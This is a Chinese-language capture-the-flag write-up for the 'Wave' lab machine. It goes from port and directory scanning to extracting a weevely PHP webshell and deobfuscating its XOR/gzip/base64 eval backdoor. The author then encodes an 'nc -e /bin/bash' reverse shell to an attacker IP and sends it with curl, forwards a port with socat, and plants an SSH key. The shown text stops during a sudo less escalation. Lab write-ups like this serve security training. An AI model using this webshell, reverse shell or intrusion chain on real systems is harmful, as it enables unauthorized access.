![\"image-20240419130105572\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404191709990.png\")
<\/div>\n
![\"image-20240419130250516\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404191709995.png\")
<\/div><\/p>\n\u4fe1\u606f\u641c\u96c6<\/h2>\n\u7aef\u53e3\u626b\u63cf<\/h3>\nrustscan -a 192.168.0.104 -- -A\n\nOpen 192.168.0.104:22\nOpen 192.168.0.104:80\nPORT STATE SERVICE REASON VERSION\n22\/tcp open ssh syn-ack OpenSSH 9.2p1 Debian 2 (protocol 2.0)\n| ssh-hostkey: \n| 256 07:e9:c8:22:59:a5:00:41:15:fa:26:0f:7d:d3:29:ff (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKe0UpYSdrYZSfz8wEnzmtB6rYS+QxwxRUwAGzpy57vqkqNrVAHXyNTbkqD8a+OQMTBeCqlLnlhIFtw74VaGP7Y=\n| 256 c7:81:8e:06:49:33:8f:1a:88:3b:82:9e:27:f3:72:1e (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIF6i9HqL7v6nqbyYKQLfWZoPI7oyUyoBwBNhumUpRpWJ\n80\/tcp open http syn-ack nginx 1.22.1\n|_http-title: Site doesn't have a title (text\/html).\n| http-robots.txt: 1 disallowed entry \n|_\/backup\n| http-methods: \n|_ Supported Methods: GET HEAD\n|_http-server-header: nginx\/1.22.1\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/wave]\n\u2514\u2500$ gobuster dir -u http:\/\/192.168.0.104\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,git,jpg,txt,png\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url: http:\/\/192.168.0.104\/\n[+] Method: GET\n[+] Threads: 10\n[+] Wordlist: \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes: 404\n[+] User Agent: gobuster\/3.6\n[+] Extensions: zip,git,jpg,txt,png,php\n[+] Timeout: 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/backup (Status: 301) [Size: 169] [--> http:\/\/192.168.0.104\/backup\/]\n\/robots.txt (Status: 200) [Size: 18]\n\/phptest.php (Status: 200) [Size: 11]\nProgress: 1543920 \/ 1543927 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n\u6f0f\u6d1e\u626b\u63cf<\/h3>\n- Nikto v2.5.0\n---------------------------------------------------------------------------\n+ Target IP: 192.168.0.104\n+ Target Hostname: 192.168.0.104\n+ Target Port: 80\n+ Start Time: 2024-04-19 01:04:19 (GMT-4)\n---------------------------------------------------------------------------\n+ Server: nginx\/1.22.1\n+ \/: The anti-clickjacking X-Frame-Options header is not present. See: https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Headers\/X-Frame-Options\n+ \/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https:\/\/www.netsparker.com\/web-vulnerability-scanner\/vulnerabilities\/missing-content-type-header\/\n+ No CGI Directories found (use '-C all' to force check all possible dirs)\n+ \/backup\/: Directory indexing found.\n+ \/robots.txt: Entry '\/backup\/' is returned a non-forbidden or redirect HTTP code (200). See: https:\/\/portswigger.net\/kb\/issues\/00600600_robots-txt-file+ \/robots.txt: contains 1 entry which should be manually viewed. See: https:\/\/developer.mozilla.org\/en-US\/docs\/Glossary\/Robots.txt\n+ \/backup\/: This might be interesting.\n+ \/#wp-config.php#: #wp-config.php# file found. This file contains the credentials.\n+ 8103 requests: 0 error(s) and 7 item(s) reported on remote host\n+ End Time: 2024-04-19 01:04:32 (GMT-4) (13 seconds)\n---------------------------------------------------------------------------\n+ 1 host(s) tested<\/code><\/pre>\n\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n\u8e29\u70b9<\/h3>\n<h1> WAVE <\/h1>\n\n<!-- wAvE --><\/code><\/pre>\n![\"image-20240419130532476\"](\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\")
<\/div><\/p>\n\u654f\u611f\u76ee\u5f55<\/h3>\nhttp:\/\/192.168.0.104\/robots.txt<\/code><\/pre>\nDisallow: \/backup<\/code><\/pre>\nhttp:\/\/192.168.0.104\/backup\/<\/code><\/pre>\n<\/div><\/p>\n\u4e0b\u8f7d\u4e0b\u6765\u770b\u770b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/wave]\n\u2514\u2500$ ls -la\ntotal 28\ndrwxr-xr-x 2 kali kali 4096 Apr 19 01:08 .\ndrwxr-xr-x 52 kali kali 4096 Apr 19 01:02 ..\n-rw-r--r-- 1 kali kali 31 Sep 4 2023 index.bck\n-rw-r--r-- 1 kali kali 4 Sep 4 2023 log.log\n-rw-r--r-- 1 kali kali 32 Sep 4 2023 phptest.bck\n-rw-r--r-- 1 kali kali 18 Sep 4 2023 robots.bck\n-rw-r--r-- 1 kali kali 515 Sep 5 2023 weevely.bck\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/wave]\n\u2514\u2500$ cat index.bck \n<h1> WAVE <\/h1>\n\n<!-- wAvE -->\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/wave]\n\u2514\u2500$ cat log.log \nOK\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/wave]\n\u2514\u2500$ cat phptest.bck \n<?php\nprint ("HELLO WORLD");\n?>\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/wave]\n\u2514\u2500$ cat robots.bck \nDisallow: \/backup\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/wave]\n\u2514\u2500$ cat weevely.bck \n<?php include "\\160\\x68\\141\\x72\\72\\57\\57".basename(__FILE__)."\\57\\x78";__HALT_COMPILER(); ?>\/x\ufffdX\ufffd\ufffd\u0317\ufffdU\ufffd\ufffdj\ufffd0\u017f\ufffd)J\ufffdhB\ufffdS;\ufffd\ufffd\ufffd\n \ufffd\/\ufffdJ\ufffd\ufffdm\ufffd.\ufffd\ufffd)\ufffd\ufffdn@\ufffd\ufffd.\ufffd\\\ufffd]=6\ufffd&T\ufffdYE\ufffdp\ufffd\ufffd(\ufffd\ufffd"`\ufffda'H\ufffdPq6\ufffd.\ufffdv\ufffd\ufffd\ufffd\/\ufffd8\ufffd\u0133e\ufffd\ufffd$+\ufffd\ufffds\ufffd"\ufffd\ufffd\ufffd\ufffd5\ufffd|\ufffd\ufffdH\ufffd\ufffd O\ufffd\ufffd\ufffd\ufffdw\ufffd2%\ufffd\ufffdOyTV\ufffd\ufffd\ufffdQ\ufffdb\ufffdA\ufffd\ufffd\ufffdh\ufffd\ufffd=\ufffdW {\ufffd\ufffd\n\ufffdk\u041bw8\ufffda\ufffd\ufffd\ufffd\ufffdS\ufffd\ufffd\ufffd\ufffd\ufffd\n\ufffdfBLXx \ufffd\ufffd\ufffd\u03dc\ufffd\ufffd\ufffd\ufffdv\ufffd\ufffd\ufffd\ufffdm\ufffd\ufffd\ufffd%#,H\ufffd\ufffdR#2HJ]\ufffdt\ufffd|*\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffdh\ufffdMs\ufffd\n \u0696&'\ufffd\ufffdY\ufffd\ufffd\ufffdP\ufffd\ufffdB\ufffd\ufffdlXw\ufffdl\ufffde\ufffd\ufffd\ufffdE!S\ufffdHe\ufffd2\ufffdp\ufffd7G\ufffd[N\ufffd\ufffd=\ufffd-\ufffd\ufffd\u0243\ufffdi\ufffd)\ufffd[\ufffd\ufffdN\ufffd\ufffd\ufffd7\ufffd\ufffdU_\ufffd=*\ufffd\ufffd\u03a8\ufffds?c((VGBMB<\/code><\/pre>\n\u770b\u6765\u91cd\u70b9\u5728\u4e8eweevely.bck<\/code>\uff0c\u770b\u4e00\u4e0b\u8fd9\u662f\u5565\uff1a<\/p>\n\n\u5e26\u6709SHA1\u7b7e\u540d\u7684PHP Phar\u5f52\u6863\u6587\u4ef6\u662f\u4e00\u79cd\u4e13\u4e3a\u6253\u5305\u548c\u5206\u53d1PHP\u5e94\u7528\u7a0b\u5e8f\u6216\u5e93\u800c\u8bbe\u8ba1\u7684\u538b\u7f29\u6587\u4ef6\u683c\u5f0f\u3002"Phar"\u662f"PHP Archive"\u7684\u7f29\u5199\uff0c\u76f8\u5f53\u4e8eJava\u4e2d\u7684JAR\u6587\u4ef6\u6216ZIP\u5f52\u6863\u6587\u4ef6\u5728PHP\u751f\u6001\u7cfb\u7edf\u4e2d\u7684\u89d2\u8272\u3002<\/p>\n<\/blockquote>\n
\u8fd8\u6709\u4e00\u4e2a\u76ee\u5f55\uff1a<\/p>\n
http:\/\/192.168.0.104\/phptest.php<\/code><\/pre>\nHELLO WORLD<\/code><\/pre>\n\u8054\u60f3\u5230\u8fd9\u51e0\u4e2a\u5173\u7cfb\uff1a<\/p>\n
phptest.php --> phptest.bck\nrobots.bck --> robots.bck\nindex.php --> index.bck\n? --> log.log\n? --> weevely.bck<\/code><\/pre>\n\u5c1d\u8bd5fuzz\u4e00\u4e0b\uff1a<\/p>\n
php\nphp7\nphp5\nphp4\nphp3\nphp2\nphp1\nhtml\nhtm\nphtml\npht\nPhp\npHp\nphP\nPHP<\/code><\/pre>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/wave]\n\u2514\u2500$ ffuf -w file:FILE -w dotphp:EXT -u http:\/\/192.168.0.104\/FILE.EXT \n\n \/'___\\ \/'___\\ \/'___\\ \n \/\\ \\__\/ \/\\ \\__\/ __ __ \/\\ \\__\/ \n \\ \\ ,__\\\\ \\ ,__\\\/\\ \\\/\\ \\ \\ \\ ,__\\ \n \\ \\ \\_\/ \\ \\ \\_\/\\ \\ \\_\\ \\ \\ \\ \\_\/ \n \\ \\_\\ \\ \\_\\ \\ \\____\/ \\ \\_\\ \n \\\/_\/ \\\/_\/ \\\/___\/ \\\/_\/ \n\n v2.1.0-dev\n________________________________________________\n\n :: Method : GET\n :: URL : http:\/\/192.168.0.104\/FILE.EXT\n :: Wordlist : FILE: \/home\/kali\/temp\/wave\/file\n :: Wordlist : EXT: \/home\/kali\/temp\/wave\/dotphp\n :: Follow redirects : false\n :: Calibration : false\n :: Timeout : 10\n :: Threads : 40\n :: Matcher : Response status: 200-299,301,302,307,401,403,405,500\n________________________________________________\n\n[Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 18ms]\n * EXT: php7\n * FILE: weevely\n\n:: Progress: [30\/30] :: Job [1\/1] :: 0 req\/sec :: Duration: [0:00:00] :: Errors: 0 ::<\/code><\/pre>\n\u62ff\u4e0b\uff01weevely.php7<\/code>\uff0c\u5c1d\u8bd5\u63d0\u53d6\u4e00\u4e0b\uff1a<\/p>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/wave]\n\u2514\u2500$ vim extract.php\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/wave]\n\u2514\u2500$ php extract.php\nPHP Fatal error: Uncaught UnexpectedValueException: Cannot create phar 'weevely.bck', file extension (or combination) not recognised or the directory does not exist in \/home\/kali\/temp\/wave\/extract.php:2\nStack trace:\n#0 \/home\/kali\/temp\/wave\/extract.php(2): Phar->__construct()\n#1 {main}\n thrown in \/home\/kali\/temp\/wave\/extract.php on line 2\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/wave]\n\u2514\u2500$ mv weevely.bck weevely.phar \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/wave]\n\u2514\u2500$ vim extract.php \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/wave]\n\u2514\u2500$ php extract.php \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/wave]\n\u2514\u2500$ ls -la\ntotal 44\ndrwxr-xr-x 3 kali kali 4096 Apr 19 01:30 .\ndrwxr-xr-x 52 kali kali 4096 Apr 19 01:02 ..\n-rw-r--r-- 1 kali kali 69 Apr 19 01:17 dotphp\n-rw-r--r-- 1 kali kali 76 Apr 19 01:30 extract.php\n-rw-r--r-- 1 kali kali 12 Apr 19 01:17 file\n-rw-r--r-- 1 kali kali 31 Sep 4 2023 index.bck\n-rw-r--r-- 1 kali kali 4 Sep 4 2023 log.log\n-rw-r--r-- 1 kali kali 32 Sep 4 2023 phptest.bck\n-rw-r--r-- 1 kali kali 18 Sep 4 2023 robots.bck\n-rwxr-xr-x 1 kali kali 515 Sep 5 2023 weevely.phar\ndrwxr-xr-x 2 kali kali 4096 Apr 19 01:30 weevely.php7\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/wave]\n\u2514\u2500$ cat extract.php \n<?php\n$phar = new Phar("weevely.phar"); \n$phar->extractTo("weevely.php7");<\/code><\/pre>\n\u63d2\u5361\u4e00\u4e0b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/wave]\n\u2514\u2500$ cd weevely.php7 \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/wave\/weevely.php7]\n\u2514\u2500$ ls -la\ntotal 12\ndrwxr-xr-x 2 kali kali 4096 Apr 19 01:30 .\ndrwxr-xr-x 3 kali kali 4096 Apr 19 01:30 ..\n-rwxrwxrwx 1 kali kali 481 Apr 19 01:30 x\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/wave\/weevely.php7]\n\u2514\u2500$ cat x \n<?php eval('$k="3ddf0d5c";$kh="b6e7a529b6c2";$kf="d598a771749b";$p="afnqDsRcBpVmU71y";\n\nfunction x($t,$k){\n$c=strlen($k);$l=strlen($t);$o="";\nfor($i=0;$i<$l;){\nfor($j=0;($j<$c&&$i<$l);$j++,$i++)\n{\n$o.=$t[$i]^$k[$j];\n}\n}\nreturn $o;\n}\nif (@preg_match("\/$kh(.+)$kf\/",@file_get_contents("php:\/\/input"),$m)==1) {\n@ob_start();\n@eval(@gzuncompress(@x(@base64_decode($m[1]),$k)));\n$o=@ob_get_contents();\n@ob_end_clean();\n$r=@base64_encode(@x(@gzcompress($o),$k));\nprint("$p$kh$r$kf");\n}');<\/code><\/pre>\n<?php\n\n$k = "3ddf0d5c";\n$kh = "b6e7a529b6c2";\n$kf = "d598a771749b";\n$p = "afnqDsRcBpVmU71y";\n\nfunction x($t, $k)\n{\n $c = strlen($k);\n $l = strlen($t);\n $o = "";\n\n for ($i = 0; $i < $l; )\n {\n for ($j = 0; ($j < $c && $i < $l); $j++, $i++)\n {\n $o .= $t[$i] ^ $k[$j];\n }\n }\n\n return $o;\n}\n\nif (@preg_match("\/$kh(.+)$kf\/", @file_get_contents("php:\/\/input"), $m) == 1)\n{\n @ob_start();\n\n @eval(@gzuncompress(@x(@base64_decode($m[1]), $k)));\n\n $o = @ob_get_contents();\n @ob_end_clean();\n\n $r = @base64_encode(@x(@gzcompress($o), $k));\n\n print("$p$kh$r$kf");\n}<\/code><\/pre>\n\u8fdb\u884c\u4e86\u4e09\u4e2a\u64cd\u4f5c\uff0c\u538b\u7f29<\/code>\uff0cXOR<\/code>\u4ee5\u53cabase64<\/code>\u7f16\u7801\uff0c\u5c1d\u8bd5\u8fdb\u884c\u5229\u7528\uff1a<\/p>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/wave\/weevely.php7]\n\u2514\u2500$ curl -X POST 192.168.0.104\/weevely.php7 -d "b6e7a529b6c2 \u547d\u4ee4 d598a771749b"\nafnqDsRcBpVmU71yb6e7a529b6c2S\/hnZjBkNWI=d598a771749b<\/code><\/pre>\n\u5c1d\u8bd5\u521b\u5efa\u4e00\u4e2a\u903b\u8f91\u76f8\u53cd\u7684\u811a\u672c\uff0c\u4f7f\u5176\u53ef\u4ee5\u4f20\u5165\u6211\u4eec\u7684\u547d\u4ee4\uff1a<\/p>\n
<?php\n$k = "3ddf0d5c";\nfunction x($t, $k)\n{\n $c = strlen($k);\n $l = strlen($t);\n $o = "";\n\n for ($i = 0; $i < $l; )\n {\n for ($j = 0; ($j < $c && $i < $l); $j++, $i++)\n {\n $o .= $t[$i] ^ $k[$j];\n }\n }\n\n return $o;\n}\nprint(@base64_encode(@x(@gzcompress('system("nc -e \/bin\/bash 192.168.0.143 1234");'),$k)));<\/code><\/pre>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/wave\/weevely.php7]\n\u2514\u2500$ php decrypt.php\nS\/hPyBxKfK7mNK4tZrR4NuMrrqrjK39P\/TRU0gS2BleAtFe2A1AENQNQVlBhtoFlM15FbdU=<\/code><\/pre>\n\u63d2\u5165\u8fdb\u53bb\uff0c\u7136\u540e\u76d1\u542c\u6267\u884c\u547d\u4ee4\uff1a<\/p>\n
curl -X POST 192.168.0.104\/weevely.php7 -d "b6e7a529b6c2S\/hPyBxKfK7mNK4tZrR4NuMrrqrjK39P\/TRU0gS2BleAtFe2A1AENQNQVlBhtoFlM15FbdU=d598a771749b"<\/code><\/pre>\n<\/div><\/p>\n\u62ff\u5230shell\u4e86\uff01<\/p>\n
\u63d0\u6743<\/h2>\n\u4fe1\u606f\u641c\u96c6<\/h3>\n(remote) www-data@wave:\/var\/www\/html$ whoami;id\nwww-data\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\n(remote) www-data@wave:\/var\/www\/html$ sudo -l\n[sudo] password for www-data: \nsudo: a password is required\n(remote) www-data@wave:\/var\/www\/html$ ls -la\ntotal 32\ndrwxr-xr-x 3 www-data www-data 4096 Sep 5 2023 .\ndrwxr-xr-x 3 root root 4096 Sep 4 2023 ..\ndrwxr-xr-x 2 www-data www-data 4096 Sep 5 2023 backup\n-rw-r--r-- 1 www-data www-data 31 Sep 4 2023 index.html\n-rw-r--r-- 1 www-data www-data 32 Sep 4 2023 phptest.php\n-rw-r--r-- 1 www-data www-data 18 Sep 4 2023 robots.txt\n-rw-r--r-- 1 root root 515 Sep 5 2023 weevely.bck\n-rw-r--r-- 1 www-data www-data 515 Sep 5 2023 weevely.php7\n(remote) www-data@wave:\/var\/www\/html$ cd ..\/..\/ \n(remote) www-data@wave:\/var$ ls -la\ntotal 48\ndrwxr-xr-x 12 root root 4096 Sep 4 2023 .\ndrwxr-xr-x 18 root root 4096 Sep 4 2023 ..\ndrwxr-xr-x 2 root root 4096 Apr 19 07:20 backups\ndrwxr-xr-x 10 root root 4096 Sep 4 2023 cache\ndrwxr-xr-x 24 root root 4096 Sep 4 2023 lib\ndrwxrwsr-x 2 root staff 4096 Mar 2 2023 local\nlrwxrwxrwx 1 root root 9 Sep 4 2023 lock -> \/run\/lock\ndrwxr-xr-x 8 root root 4096 Apr 19 07:00 log\ndrwxrwsr-x 2 root mail 4096 Sep 4 2023 mail\ndrwxr-xr-x 2 root root 4096 Sep 4 2023 opt\nlrwxrwxrwx 1 root root 4 Sep 4 2023 run -> \/run\ndrwxr-xr-x 3 root root 4096 Sep 4 2023 spool\ndrwxrwxrwt 4 root root 4096 Apr 19 07:39 tmp\ndrwxr-xr-x 3 root root 4096 Sep 4 2023 www\n(remote) www-data@wave:\/var$ mail\nbash: mail: command not found\n(remote) www-data@wave:\/var$ cd mail\n(remote) www-data@wave:\/var\/mail$ ls -la\ntotal 8\ndrwxrwsr-x 2 root mail 4096 Sep 4 2023 .\ndrwxr-xr-x 12 root root 4096 Sep 4 2023 ..\n(remote) www-data@wave:\/var\/mail$ cd ..\/\n(remote) www-data@wave:\/var$ cd backups\/\n(remote) www-data@wave:\/var\/backups$ ls -la\ntotal 16\ndrwxr-xr-x 2 root root 4096 Apr 19 07:20 .\ndrwxr-xr-x 12 root root 4096 Sep 4 2023 ..\n-rw-r--r-- 1 root root 8019 Sep 4 2023 apt.extended_states.0\n(remote) www-data@wave:\/var\/backups$ cd \/home\n(remote) www-data@wave:\/home$ ls -la\ntotal 16\ndrwxr-xr-x 4 root root 4096 Sep 4 2023 .\ndrwxr-xr-x 18 root root 4096 Sep 4 2023 ..\ndrwx------ 3 angie angie 4096 Sep 5 2023 angie\ndrwx------ 2 carla carla 4096 Sep 4 2023 carla\n(remote) www-data@wave:\/home$ cd angie\/\nbash: cd: angie\/: Permission denied\n(remote) www-data@wave:\/home$ cd carla\/\nbash: cd: carla\/: Permission denied\n(remote) www-data@wave:\/home$ ss -tulnp\nNetid State Recv-Q Send-Q Local Address:Port Peer Address:Port Process\nudp UNCONN 0 0 0.0.0.0:68 0.0.0.0:*\ntcp LISTEN 0 1024 127.0.0.1:3923 0.0.0.0:*\ntcp LISTEN 0 511 0.0.0.0:80 0.0.0.0:* users:\ntcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*\ntcp LISTEN 0 511 [::]:80 [::]:* users: \ntcp LISTEN 0 128 [::]:22 [::]:*<\/code><\/pre>\n\u7aef\u53e3\u8f6c\u53d1<\/h3>\n(remote) www-data@wave:\/home$ cd \/tmp\n(remote) www-data@wave:\/tmp$ \n(local) pwncat$ lpwd\n\/home\/kali\/temp\/wave\n(local) pwncat$ lcd ..\n(local) pwncat$ upload socat\n.\/socat \u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501 100.0% \u2022 375.2\/375.2 KB \u2022 ? \u2022 0:00:00[01:56:23] uploaded 375.18KiB in 0.52 seconds upload.py:76\n(local) pwncat$ \n(remote) www-data@wave:\/tmp$ chmod +x socat\n(remote) www-data@wave:\/tmp$ .\/socat TCP-LISTEN:8888,reuseaddr,fork TCP:127.0.0.1:3923<\/code><\/pre>\n\u5c1d\u8bd5\u8fdb\u884c\u8bbf\u95ee\uff1a<\/p>\n
<\/div><\/p>\n\u7136\u540e\u770b\u5230\u4e86flag\uff1a<\/p>\n
http:\/\/192.168.0.104:8888\/user.txt<\/code><\/pre>\nHMVIdsEwudDxJDSaue32DJa<\/code><\/pre>\n\u4e0a\u4f20\u516c\u94a5\u767b\u5f55angie<\/h3>\n
\u731c\u6d4b\u8fd9\u662f\u67d0\u4e2a\u7528\u6237\u7684\u76ee\u5f55\uff0c\u5c1d\u8bd5\u4e0a\u4f20\u516c\u94a5\uff1a<\/p>\n
<\/div><\/p>\n\u73b0\u5728\u672c\u5730\u751f\u6210\u4e00\u4e2a\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/wave]\n\u2514\u2500$ mkdir .ssh \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/wave]\n\u2514\u2500$ cd .ssh\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/wave\/.ssh]\n\u2514\u2500$ ssh-keygen -t rsa \nGenerating public\/private rsa key pair.\nEnter file in which to save the key (\/home\/kali\/.ssh\/id_rsa): wave\nEnter passphrase (empty for no passphrase): \nEnter same passphrase again: \nYour identification has been saved in wave\nYour public key has been saved in wave.pub\nThe key fingerprint is:\nSHA256:Z54ECWnXNfv0Xn8J1Mg5X6mSNGexML65DCqBI89RlOQ kali@kali\nThe key's randomart image is:\n+---[RSA 3072]----+\n| .oo. . +o. |\n| o.o...o +o* .|\n| E .o +.X.o.|\n| o .. Oo+..|\n| . + . S.+= o..o|\n| + o . .=o.o ..+|\n| o . . oo .+|\n| . .|\n| |\n+----[SHA256]-----+\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/wave\/.ssh]\n\u2514\u2500$ ls -la\ntotal 16\ndrwxr-xr-x 2 kali kali 4096 Apr 19 02:03 .\ndrwxr-xr-x 4 kali kali 4096 Apr 19 02:02 ..\n-rw------- 1 kali kali 2590 Apr 19 02:03 wave\n-rw-r--r-- 1 kali kali 563 Apr 19 02:03 wave.pub\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/wave\/.ssh]\n\u2514\u2500$ cat wave.pub \nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCdqHIaORaxfuxWiWq68JQH1InqIKbA5R83FJ3lU2KiZK+jV1DvSepdzgCbpZuau3PIryo1xKO+ATOauAX6Z5E1TPFDqrnhBhFUTBa5RA0WoHEJl7TuPt3DINGRjlwOcrwunsFjdyVvTDQfI+Wgyto9jXAPKUVgC\/voy+8JNbmNAZ3tKpeYtjIMgl7K+EzabnYaPswMupGfSMzH15NzL7O5enVkhkZmdB3YgqQZOZSk9tYy\/WlM50j4Wt6Yjjcz\/rMSKZPuagcZn68lqR8mDVr1uB76xQCEmWyluKVAAUOhZaKKKEJdgDkHzHQg99jhUUOw8HDE8UKEXTMbEx5Hgmk8xB3ORqU2pq9R9mh\/t2B0X2KyyEjy\/Tnlg7XWAVoGyv9t8kritilZQC3hF0a8tBrBKB93\/2FNB83FK9Ghk+OfsiEpxIdIW5kd76QmR6OUZ7nK0Ku0dtNjSjmoP7Hs\/FbDuNcaNfWTXUD8V1pnwMno\/TFBXgohckGng5GJ1sF\/0ok= kali@kali<\/code><\/pre>\n\u6539\u4e2a\u540d\u4e0a\u4f20\uff1a<\/p>\n
<\/div>
\n<\/div><\/p>\n\u5c1d\u8bd5\u8fdb\u884c\u767b\u5f55\uff0c\u4f46\u662f\u5931\u8d25\u4e86\uff0c\u53ef\u80fd\u662f\u7c98\u8d34\u5230windows\u51fa\u73b0\u4e86\u4e00\u4e9b\u95ee\u9898\uff0c\u5c1d\u8bd5\u5728linux\u4e0b\u8fdb\u884c\u5c1d\u8bd5\uff0c\u5148\u91cd\u542f\u4e00\u4e0b\u9776\u673a\uff1a<\/p>\n
<\/div><\/p>\n\u574f\u4e8b\u4e86\uff0c\u91cd\u65b0\u8f7d\u5165\u9776\u673a\u3002\u3002\u3002\u3002<\/p>\n
<\/div><\/p>\n\u76f4\u63a5\u4f20linux\u7684\u6587\u4ef6\u8fc7\u53bb\uff1a<\/p>\n
<\/div><\/p>\n\u518d\u8bd5\u4e00\u6b21\uff1a<\/p>\n
<\/div><\/p>\n\u6210\u529f\uff01<\/p>\n
\u4fe1\u606f\u641c\u96c6<\/h3>\nangie@wave:~$ ls -la\ntotal 680\ndrwx------ 5 angie angie 4096 abr 19 10:59 .\ndrwxr-xr-x 4 root root 4096 sep 4 2023 ..\nlrwxrwxrwx 1 angie angie 9 sep 4 2023 .bash_history -> \/dev\/null\n-rw-r--r-- 1 angie angie 220 sep 4 2023 .bash_logout\n-rw-r--r-- 1 angie angie 3526 sep 4 2023 .bashrc\n-rw-r--r-- 1 angie angie 646042 sep 2 2023 copyparty-sfx.py\ndrwxr-xr-x 2 angie angie 4096 abr 19 10:59 .hist\ndrwxr-xr-x 3 angie angie 4096 sep 4 2023 .local\n-rw-r--r-- 1 angie angie 807 sep 4 2023 .profile\n-rw-r--r-- 1 angie angie 66 sep 4 2023 .selected_editor\ndrwxr-xr-x 2 angie angie 4096 abr 19 10:58 .ssh\n-rw------- 1 angie angie 24 sep 4 2023 user.txt\n-rw-r--r-- 1 angie angie 165 sep 4 2023 .wget-hsts\n-rw------- 1 angie angie 50 sep 5 2023 .Xauthority\nangie@wave:~$ cat user.txt\nHMVIdsEwudDxJDSaue32DJa\nangie@wave:~$ sudo -l\nMatching Defaults entries for angie on wave:\n env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin, use_pty\n\nUser angie may run the following commands on wave:\n (ALL) NOPASSWD: \/usr\/bin\/less -F \/opt\/secret.txt\nangie@wave:~$ sudo \/usr\/bin\/less -F \/opt\/secret.txt\nDietro di lui, \ndietro di lui solo la nebbia.<\/code><\/pre>\n
